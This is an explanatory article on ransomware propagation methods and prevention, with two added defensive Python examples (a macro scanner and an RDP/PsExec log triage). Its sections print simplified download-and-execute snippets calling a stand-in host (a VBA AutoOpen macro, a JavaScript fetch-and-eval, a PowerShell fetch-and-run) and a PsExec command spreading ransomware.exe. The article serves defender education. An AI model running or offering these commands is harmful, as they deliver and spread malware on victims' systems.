Table of contents
- How ransomware spreads
- Phishing and malicious emails
- Downloads from compromised websites
- Software vulnerabilities and exploits
- Attacks through Remote Desktop Protocol (RDP)
- Supply chain compromise
- Lateral movement inside corporate networks
- The Ransomware-as-a-Service model
- Strategies to prevent ransomware spread
In recent years, ransomware has become one of the most dangerous cyber threats for businesses, institutions, and private users. This type of malware is designed to block access to a victim’s data or computer systems, demanding the payment of a ransom to restore access to files.
While ransomware attacks used to be relatively simple and often limited to spam email campaigns, the methods of distribution have become much more sophisticated. Cybercriminals now use a combination of techniques such as phishing, software vulnerabilities, supply chain attacks, and credential compromise to infiltrate computer systems.
Understanding how ransomware spreads is therefore essential for developing effective defense strategies. In this article we will analyze the main ransomware propagation methods in depth, with concrete examples and practical recommendations to improve cyber security.
How ransomware spreads
The spread of ransomware almost always follows a precise pattern. Attackers must first obtain an entry point inside a system or corporate network. Once access is gained, the malware is installed and the data encryption phase is triggered.
The process can generally be divided into several main stages:
- Initial access
- Privilege escalation
- Lateral movement within the network
- Malware deployment
- Data encryption and ransom demand
This structure often reflects the techniques documented in threat analysis frameworks such as MITRE ATT&CK.
Example
A ransomware attack may begin with a simple phishing email that convinces an employee to open an attachment. Hidden inside the file is malicious code that installs a loader, which in turn downloads the actual ransomware.
Phishing and malicious emails
One of the most common ways ransomware spreads is through phishing campaigns.
Attackers send emails that appear to come from trusted sources such as banks, suppliers, or coworkers. These messages often contain attachments or links that trigger the download of malware.
A typical example might be an email with the subject line:
“Urgent invoice – payment pending”
The attachment could be a Word or Excel document containing malicious macros. When the user enables the macros, a script is executed that downloads the ransomware from a remote server.
Below is a simplified example of a malicious macro commonly used in many attacks:
Sub AutoOpen()
Dim url As String
url = "http://malicious-server.com/payload.exe"
Dim filePath As String
filePath = Environ("TEMP") & "\payload.exe"
DownloadFile url, filePath
Shell filePath
End Sub
This type of code shows how a simple document can become a vehicle for malware distribution.
Phishing campaigns remain extremely effective because they exploit the weakest link in cyber security: the human factor.
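As an added example that is not part of the article, a small Python heuristic scanner for extracted VBA source that flags the pattern the macro above shows (an auto-execution entry point, a remote URL, a drop into TEMP, a download routine and a Shell call). The indicator list, weights and thresholds are assumptions made for this example, and the two macro texts are constructed samples: one modelled on the article's snippet, one benign.

```python
import re

# Constructed sample modelled on the macro shown in the article (not a real document).
SAMPLE_MACRO = '''Sub AutoOpen()
Dim url As String
url = "http://malicious-server.com/payload.exe"
Dim filePath As String
filePath = Environ("TEMP") & "\\payload.exe"
DownloadFile url, filePath
Shell filePath
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_MACRO = '''Sub FormatTotals()
Range("A1:D1").Font.Bold = True
End Sub
'''

# Heuristic indicators with assumed weights (name, regex, weight).
URL_RE = re.compile(r"https?://[^\s\"'()]+", re.I)
INDICATORS = [
    ("auto-exec", re.compile(r"\bSub\s+(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", re.I), 2),
    ("remote-url", URL_RE, 2),
    ("temp-path", re.compile(r'Environ\s*\(\s*"TEMP"\s*\)', re.I), 1),
    ("exe-drop", re.compile(r"\.(exe|dll|scr|bat|ps1|vbs)\b", re.I), 1),
    ("download", re.compile(r"\b(URLDownloadToFile|DownloadFile|XMLHTTP|WinHttpRequest)\b", re.I), 3),
    ("execute", re.compile(r"\b(Shell|ShellExecute|WScript\.Shell|CreateObject)\b", re.I), 3),
]

def scan_macro(source):
    """Return matched indicator names, extracted URLs and a weighted score."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(source)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"indicators": hits, "urls": sorted(set(URL_RE.findall(source))), "score": score}

def verdict(result):
    """'block' when the full chain (auto-exec + download + execute) or a high score is present;
    partial matches go to 'review'; thresholds are assumptions for this example."""
    chain = {"auto-exec", "download", "execute"} <= set(result["indicators"])
    if chain or result["score"] >= 6:
        return "block"
    return "review" if result["score"] >= 3 else "allow"

if __name__ == "__main__":
    for label, macro in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        r = scan_macro(macro)
        print(label, verdict(r), r)
```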
Downloads from compromised websites
Another widely used method for spreading ransomware involves compromised websites.
In this scenario attackers inject malicious code into legitimate web pages. When a user visits the site, the code attempts to exploit vulnerabilities in the browser or installed plugins.
This type of attack is known as a drive-by download.
The process works as follows:
- the user visits a compromised website
- the browser executes malicious JavaScript code
- a system vulnerability is exploited
- the ransomware is downloaded and installed
A simplified example of JavaScript used in exploit kits might look like this:
fetch("http://malicious-server.com/exploit")
.then(response => response.text())
.then(data => {
eval(data);
});
In real attacks the exploits are far more complex, but this example shows how remote code can be executed directly in the browser.
Software vulnerabilities and exploits
Many ransomware attacks exploit vulnerabilities in operating systems or enterprise software.
When software contains an unpatched security flaw, attackers can use it to gain remote access to the system.
One famous example was the WannaCry attack, which exploited a vulnerability in the Windows SMB protocol.
Exploits allow cybercriminals to execute code on the victim’s system without requiring any user interaction.
For instance, an attack could use a script similar to this:
import socket
target = "192.168.1.10"
port = 445
payload = b"malicious_payload"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(payload)
In a real scenario the payload would be much more sophisticated and designed to exploit specific operating system vulnerabilities.
Attacks through Remote Desktop Protocol (RDP)
Another common method of spreading ransomware is unauthorized access to servers via Remote Desktop Protocol (RDP).
Many companies expose RDP services directly to the internet so employees can access systems remotely. If passwords are weak or two-factor authentication is not enabled, attackers can attempt brute-force attacks to gain access.
Once inside the system, cybercriminals can manually deploy the ransomware.
This method is particularly dangerous because attackers can:
- explore the corporate network
- disable security systems
- delete backups
- distribute ransomware across multiple machines
Many ransomware groups use legitimate administrative tools such as PowerShell to move through the network.
An example command used to distribute malware could be:
Invoke-WebRequest -Uri "http://malicious-server.com/ransomware.exe" -OutFile "C:\temp\ransomware.exe"
Start-Process "C:\temp\ransomware.exe"
Supply chain compromise
In recent years a new type of attack has become increasingly common: software supply chain compromise.
In this scenario attackers insert malicious code into legitimate software used by thousands of companies.
When the software is updated, the malware is automatically distributed to all users.
One of the most well-known cases was the attack on the SolarWinds platform.
This type of attack is extremely dangerous because it exploits the trust users place in software vendors.
According to reports from the National Institute of Standards and Technology, supply chain security has become one of the top priorities in global cyber security.
Lateral movement inside corporate networks
Once ransomware gains access to a system, it does not usually limit itself to a single computer.
Attackers attempt to spread throughout the corporate network in order to maximize damage and increase the likelihood that the ransom will be paid.
This process is known as lateral movement.
Commonly used tools include:
- PsExec
- PowerShell
- stolen credentials
- network exploits
Example
An attacker might use PsExec to execute ransomware on other computers within the network:
psexec \\192.168.1.20 -u admin -p password ransomware.exe
Within minutes the malware can spread to dozens or even hundreds of systems.
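As an added example that is not part of the article, the defender-side counterpart to the RDP brute-force and PsExec techniques described in this section and in the RDP section above: a Python triage over constructed Windows event lines that flags a burst of failed RDP logons (Security event 4625, logon type 10) and whether a success (4624) followed it, and the PSEXESVC service install (System event 7045) that PsExec leaves on each target. The line format, thresholds and time window are assumptions for this example, and the addresses are documentation ranges.

```python
from datetime import datetime, timedelta

# Constructed sample events in a simplified "timestamp channel event_id key=value ..." shape,
# not real logs; the source addresses are RFC 5737 documentation ranges.
SAMPLE_EVENTS = """\
2024-05-01T02:14:01Z Security 4625 LogonType=10 SrcIp=203.0.113.7 User=administrator
2024-05-01T02:14:03Z Security 4625 LogonType=10 SrcIp=203.0.113.7 User=admin
2024-05-01T02:14:05Z Security 4625 LogonType=10 SrcIp=203.0.113.7 User=backup
2024-05-01T02:14:08Z Security 4625 LogonType=10 SrcIp=203.0.113.7 User=sql
2024-05-01T02:14:10Z Security 4625 LogonType=10 SrcIp=203.0.113.7 User=svc_rdp
2024-05-01T02:16:40Z Security 4624 LogonType=10 SrcIp=203.0.113.7 User=svc_rdp
2024-05-01T02:20:12Z System 7045 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe
2024-05-01T08:01:00Z Security 4625 LogonType=10 SrcIp=198.51.100.4 User=jdoe
"""

def parse_event(line):
    """Split one sample line into a dict with a datetime, channel, event id and fields."""
    ts, channel, event_id, *kv = line.split()
    fields = dict(pair.split("=", 1) for pair in kv)
    fields.update(ts=datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), channel=channel, id=int(event_id))
    return fields

def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=2)):
    """Flag a source IP once it reaches >= threshold RDP failures (4625, LogonType 10) inside the
    sliding window, and record whether an RDP success (4624) from that IP followed the burst."""
    alerts, recent = {}, {}
    for ev in events:
        ip = ev.get("SrcIp")
        if ev["id"] == 4625 and ev.get("LogonType") == "10":
            # drop failures that fell out of the window, then count the rest
            recent[ip] = [t for t in recent.get(ip, []) if ev["ts"] - t <= window] + [ev["ts"]]
            if len(recent[ip]) >= threshold and ip not in alerts:
                alerts[ip] = {"failures": len(recent[ip]), "first": recent[ip][0], "success_after": False}
        elif ev["id"] == 4624 and ev.get("LogonType") == "10" and ip in alerts:
            alerts[ip]["success_after"] = True  # the burst ended in a valid logon

    return alerts

def detect_psexec(events):
    """PsExec installs a service named PSEXESVC on each target (System event 7045)."""
    return [ev for ev in events if ev["id"] == 7045
            and "PSEXESVC" in (ev.get("ServiceName", "") + ev.get("ImagePath", "")).upper()]

def triage(log_text):
    events = [parse_event(line) for line in log_text.splitlines() if line.strip()]
    return {"rdp_bruteforce": detect_rdp_bruteforce(events), "psexec": detect_psexec(events)}

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```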
The Ransomware-as-a-Service model
One factor that has accelerated the spread of ransomware is the criminal model known as Ransomware-as-a-Service (RaaS).
In this model ransomware developers create the platform and rent it to other criminals.
Affiliates are responsible for:
- spreading the malware
- compromising networks
- negotiating ransom payments
In return, a percentage of the ransom is paid to the ransomware developers.
This model has made ransomware attacks much more frequent because it has lowered the technical barrier for entering cybercrime.
Strategies to prevent ransomware spread
Preventing the spread of ransomware requires a multilayered strategy that combines technology, training, and security processes.
Some of the most effective measures include:
- keeping software up to date
- maintaining offline backups of data
- enabling multi-factor authentication
- segmenting the network
- providing phishing awareness training
Many organizations are also adopting Zero Trust security models, which limit system access and reduce the possibility of lateral movement by attackers.
Prevention remains the most effective defense, because once ransomware has encrypted data, recovery can be extremely difficult.
Conclusion
Understanding how ransomware spreads is essential for building effective defense strategies.
Modern attacks are no longer limited to simple phishing emails but combine multiple techniques such as software exploits, supply chain compromise, and unsecured remote access.
The spread of ransomware is also driven by organized criminal models like Ransomware-as-a-Service, which have transformed cybercrime into a real economic ecosystem.
For this reason organizations must adopt a proactive approach to cyber security, investing in prevention, training, and continuous monitoring.
Only by understanding how threats propagate can companies build more resilient systems and reduce the risk of devastating cyberattacks.
Questions and answers
- What is ransomware?
Ransomware is a type of malware that blocks access to data or computer systems and demands a ransom payment to restore access.
- What is the most common way ransomware spreads?
The most common method is phishing emails, which trick users into opening malicious attachments or links.
- Can ransomware spread automatically across networks?
Yes. Many ransomware variants include lateral movement capabilities that allow them to propagate to other systems.
- What is the Ransomware-as-a-Service model?
It is a criminal model where developers rent ransomware platforms to affiliates who distribute the malware.
- Do software updates help prevent ransomware?
Yes. Installing security patches reduces the risk of attackers exploiting known vulnerabilities.
- Is it possible to recover data without paying the ransom?
It depends on the ransomware variant. In some cases data can be restored through backups or decryption tools.
- Does ransomware only affect businesses?
No. Private users can also become victims of ransomware attacks.
- Can antivirus software stop ransomware?
Antivirus software helps, but it is not sufficient on its own. A layered security strategy is required.
- What is ransomware spread via RDP?
It occurs when attackers gain access to servers through Remote Desktop services using weak passwords or vulnerabilities.
- What is the best defense against ransomware?
The combination of secure backups, user training, and updated security systems is the most effective protection strategy.